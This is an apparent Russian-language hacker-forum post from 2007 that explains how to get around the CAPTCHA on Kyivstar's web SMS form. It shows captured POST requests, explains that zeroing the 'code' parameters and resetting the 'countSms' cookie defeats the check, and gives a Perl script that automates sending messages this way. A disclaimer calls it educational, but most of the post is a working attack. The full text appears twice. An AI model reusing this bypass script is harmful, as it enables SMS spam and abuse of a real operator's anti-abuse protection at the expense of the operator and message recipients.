demonoid
03.08.2007, 05:43
обход CAPTCHA III
Краткая история CAPTCH''
~~~~~~~~~~~~~~~
-CAPTCHA I
Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _http://forum.antichat.ru/thread36930-dspam.html
-CAPTCHA II
Упустим этот раздел.
Пусть останется в секрете ее обход (давно уже переделали ;) )
-CAPTCHA III
//После обсуждений киевстара с "vvs777" (03.08.2007)
началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть
Впечатление было ужасное .
После набранного номера и теста , нажав отправить я был в недоумении "Вкажіть 2 картинки живої природи",я подумал уже что
обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов .
И что я увидел:
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670 DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE 61B395669BE767085&code=0102
Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках :))
Cookie: countSms=3;
,покопавшись, попробовал передавать везде 0
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0
Тем хто непонял
я заменил ключи (которые генерируются фиг знает, каким способом )
code=1186099766
code=96055154
code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670 DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE 61B395669BE767085
code=0102
Заменил на
code=0
code=0
code=0
code=0
После отправки модифицированного пакета на мой телефон пришло сообщение :)
Ниже приведу простой пример отправки сообщение на перле..
#!/usr/bin/perl
# 03.08.2007
# http://mobilnik.ua/news/12301.html :)
use LWP;
use LWP::UserAgent;
use strict;
my $browser = LWP::UserAgent->new;
$browser->agent('New captha v3.0');
#$browser->proxy(['http'] => 'http://61.47.2.249:8080');
print q(
--------------------------------------
| | - | + | x |
--------------------------------------
| specical for antichat.ru _______ |
| ------------------------- | ||
| icq:212-905-288 | ? ||
| ------------------------- |_______||
-------------------------------------- );
my $mob_code = "097";
my $mob_number = "XXXXXXX";
my $messenge = "hello antichat.ru";
my $curr_cookie = "countSms=0;
isUserLogined=false;
countSms=0;
messageID=20070702223308.610CC7%40messenger";
printf "\n\n\t[+]Send %s-%s \n\tmessage: \<<%s\>> ",
$mob_code,$mob_number,$messenge ;
my $url="http://kyivstar.net/_sms/?lang=ua";
my $response = $browser->post($url,
["submitted" => "true",
"lang" => "ua",
"sms_adv" => "101",
"mobcode" => $mob_code,
"number" => $mob_number,
"lat" => 1,
"message" => $messenge,
"code" => 0,
"code" => 0,
"code" => 0,
"code" => 0],
"Content-Type"=> "application/x-www-form-urlencoded",
"Cookie" => $curr_cookie);
Важно :
1-Материал исключительно в ознакомительных целях!
2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.
Краткая история CAPTCH''
~~~~~~~~~~~~~~~
-CAPTCHA I
Самая первая каптча была банально простой ,баг был в том, что кодеры немного промахнулись и влепили код подтверждение прямо в куки , об этом можно немного почитать здесь _http://forum.antichat.ru/thread36930-dspam.html
-CAPTCHA II
Упустим этот раздел.
Пусть останется в секрете ее обход (давно уже переделали ;) )
-CAPTCHA III
//После обсуждений киевстара с "vvs777" (03.08.2007)
началось самое вкусное ,зайдя сегодня ночью на форум узнав что снова переделали на kyivstar.net каптчу решил на это взглянуть
Впечатление было ужасное .
После набранного номера и теста , нажав отправить я был в недоумении "Вкажіть 2 картинки живої природи",я подумал уже что
обхода уже не найти ,решил все-таки указать эти две картинки , врубил пакетолов .
И что я увидел:
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXX&lat=1&message=111122&code=1186099766&code=96055154&code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670 DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE 61B395669BE767085&code=0102
Ненашев нечего интересного (кроме каких-то 3-х сообщений в куках :))
Cookie: countSms=3;
,покопавшись, попробовал передавать везде 0
POST /_sms/ HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-icq, */*
Referer: http://kyivstar.net/_sms/?lang=ua
Accept-Language: ru
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: kyivstar.net
Content-Length: 240
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: countSms=3; messageID=20070702223308.610CC7%40messenger
submitted=true&lang=ua&sms_adv=122&mobcode=067&number=XXXXXXX&lat=1&message=111122&code=0&code=0&code=05&code=0
Тем хто непонял
я заменил ключи (которые генерируются фиг знает, каким способом )
code=1186099766
code=96055154
code=8D7DAAC50375DF1E37009FF4C298C59A2272227A7E670 DA3FEE8F337A1F6CE6EDEC2E139740C9289758EB5CC21002BE 61B395669BE767085
code=0102
Заменил на
code=0
code=0
code=0
code=0
После отправки модифицированного пакета на мой телефон пришло сообщение :)
Ниже приведу простой пример отправки сообщение на перле..
#!/usr/bin/perl
# 03.08.2007
# http://mobilnik.ua/news/12301.html :)
use LWP;
use LWP::UserAgent;
use strict;
my $browser = LWP::UserAgent->new;
$browser->agent('New captha v3.0');
#$browser->proxy(['http'] => 'http://61.47.2.249:8080');
print q(
--------------------------------------
| | - | + | x |
--------------------------------------
| specical for antichat.ru _______ |
| ------------------------- | ||
| icq:212-905-288 | ? ||
| ------------------------- |_______||
-------------------------------------- );
my $mob_code = "097";
my $mob_number = "XXXXXXX";
my $messenge = "hello antichat.ru";
my $curr_cookie = "countSms=0;
isUserLogined=false;
countSms=0;
messageID=20070702223308.610CC7%40messenger";
printf "\n\n\t[+]Send %s-%s \n\tmessage: \<<%s\>> ",
$mob_code,$mob_number,$messenge ;
my $url="http://kyivstar.net/_sms/?lang=ua";
my $response = $browser->post($url,
["submitted" => "true",
"lang" => "ua",
"sms_adv" => "101",
"mobcode" => $mob_code,
"number" => $mob_number,
"lat" => 1,
"message" => $messenge,
"code" => 0,
"code" => 0,
"code" => 0,
"code" => 0],
"Content-Type"=> "application/x-www-form-urlencoded",
"Cookie" => $curr_cookie);
Важно :
1-Материал исключительно в ознакомительных целях!
2-Автор этой статьи не несёт ответственность за возможные последствия использования материала в целях, запрещенных УК Укр. и нормами международного права.